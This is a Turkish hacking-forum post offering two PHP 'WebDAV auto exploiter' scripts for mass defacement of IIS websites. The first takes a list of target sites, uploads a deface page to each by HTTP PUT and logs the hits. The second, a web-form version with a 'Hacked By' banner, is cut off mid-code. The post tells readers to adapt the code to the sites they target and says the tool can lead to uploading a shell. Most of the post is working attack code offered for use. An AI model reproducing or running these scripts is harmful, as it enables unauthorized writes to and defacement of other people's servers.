WebDav Auto Exploiter Internet Information Services Code

1. Yazar => KingSkrupellos - Cyberizm.Org Digital Security Team
2.  
3. [img]https://i.hizliresim.com/JljQbE.png[/img]
4.  
5. Konu => WebDav Auto Exploiter Internet Information Services PHP Python Code
6.  
7. https://www.cyberizm.org/cyberizm-webdav-auto-exploiter-internet-information-services-php-python-code.html
8.  
9. Kullanımı => Xampp Yüklü Olması Gerekiyor.
10.  
11. Başlat + Çalıştır + cmd.exe yada Command Prompt üzerinden
12.  
13. php webdav_me.php list.htm file_deface.htm
14.  
15. Lütfen Kodları ve Siteleri Dosya İsimlerini kendinize göre yani Hedeflediğiniz Siteleri Göre Düzenleyiniz :D :cigara:
16.  
17. Başlık => WebDav Internet Information Services IIS PHP Python Auto Exploiter PHP Python Codes
18.  
19. Web-based Distributed Authoring and Versioning => WebDav'ın Açılımı
20.  
21. WebDaV Açıklı Siteleri Tarar ve Aynı Zamanda Shell Atmanıza Kadar Yolu Vardır.
22.  
23. Desteklenen Dosya Formatları => .txt .html .php
24.  
25. Kullanım Videosu =>
26.  
27. [video=youtube]https://www.youtube.com/watch?v=98SPhCj88zE[/video]
28.  
29. [video=youtube]https://www.youtube.com/watch?v=LXmfzEVM0mM[/video]
30.  
31. Ayrıca VisualBasic + C++ ile yazılmış Programı Dahi var :D
32.  
33. [code]https://nmap.org/nsedoc/scripts/http-webdav-scan.html[/code]
34.  
35. EasyWebDav Exploiter Python Kodu =>
36.  
37. [code]https://github.com/amnong/easywebdav[/code]
38.  
39. WebDav Auto Exploiter PHP Code
40.  
41. [hide][code]<?php
42. # KingSkrupellos
43. # Cyberizm Digital Security Team
44. # cyberizm.org
45.  
46. if(!is_file($argv[1]) || !is_file($argv[2])){
47. echo "\n\nUsage: php $argv[0] list.htm file_deface.htm\n\n";
48. }else{
49. $sites = $argv[1];
50. $file = $argv[2];
51. $fp = fopen($file, "r");
52. $buka=fopen("$sites","r");
53. $filesize = filesize($file);
54. $size=filesize("$sites");
55. $baca=fread($buka,$size);
56. $sites = explode("<br>", $baca);
57. foreach($sites as $site){
58. if(preg_match("#http://#", $site)) {
59. $site = $site;
60. } else {
61. $site = "http://".$site;
62. }
63. $site = "$site/$file";
64. $ch = curl_init();
65. curl_setopt($ch, CURLOPT_URL, $site);
66. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
67. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
68. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0");
69. curl_setopt($ch, CURLOPT_PUT, true);
70. curl_setopt($ch, CURLOPT_INFILE, $fp);
71. curl_setopt($ch, CURLOPT_INFILESIZE, $filesize);
72. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
73. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
74. $exec = curl_exec($ch);
75. echo "$site -> ";
76. $su = curill($site);
77. if(preg_match("/hacked/i", $su)) {
78. echo "Created Successfully\n\n";
79. file_put_contents("webdav_shell.htm", "$site<br>", FILE_APPEND);
80. } else {
81. echo "Failed\n";
82. }
83. }
84. }
85. function curill($site){
86. $ch = curl_init ("$site");
87. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
88. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
89. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
90. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
91. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
92. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
93. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
94. $data3 = curl_exec ($ch);
95. return $data3;
96. }
97. ?>[/code][/hide]
98.  
99. ____________________________________________
100.  
101. WebDav Internet Information Services IIS PHP Python Auto Exploiter PHP İkinci Otomatik Exploiter Code
102.  
103. Webdav Exploiter Web Second Version - Cyberizm Digital Security Team
104.  
105. [hide][code]<?php
106. # KingSkrupellos
107. # Cyberizm.Org Digital Security Army
108. # web version
109. ?>
110. <head><title>WebDAV Mass Exploiter</title></head>
111. <style>
112. body { font-family: Atma }
113. input, textarea { font-family: Atma }
114. th { background:black;color:#fff;padding:3px;font-family: Suez One}
115. </style>
116. <link href='http://fonts.googleapis.com/css?family=Atma' rel='stylesheet' type='text/css'/>
117. <link href='http://fonts.googleapis.com/css?family=Suez+One' rel='stylesheet' type='text/css'/>
118. <center>
119. <table><tr><th>WebDAV Exploiter IndoXploit</th></tr> <tr><td><form action="" method="POST">
120. <textarea name="isi" style="height:100px;width:500px"></textarea><br><br>
121. <textarea name="isi1" style="height:100px;width:500px">Hacked By KingSkrupellos Cyberizm.Org Digital Security Team</textarea><br><br>
122. <input type="hidden" name="site" value="list.txt">
123. <input type="hidden" name="file" value="x.htm">
124. <center><input type="submit" style="background:black;color:#fff;padding:3px;border:0" name="go" value="&lt;&lt; Execute &gt;&gt;"></center>
125. </form>
126. </td></tr></table>
127. <table> <tr><th>Result Deface</th></tr> <tr><td>
128. <div style="border:1px solid black;border-bottom:5px solid black; padding:3px;height:auto;width:500px">
129. <?php
130.  
131. if($_POST['go']){
132.  
133. $nama = "x.htm";
134. $isi = $_POST['isi1'];
135. $fp = fopen($nama,"w");
136. fputs($fp, $isi);
137.  
138. $nama = "list.txt";
139. $isi = $_POST['isi'];
140. $fp = fopen($nama,"w");
141. fputs($fp, $isi);[/code][/hide]
142.  
143. ### Makalenin Sonuna Gelmiş Bulunmaktayız. Bilginin Tadını Çıkartın. ###
144.  
145. ### KingSkrupellos - Cyberizm.Org Digital Security Team ####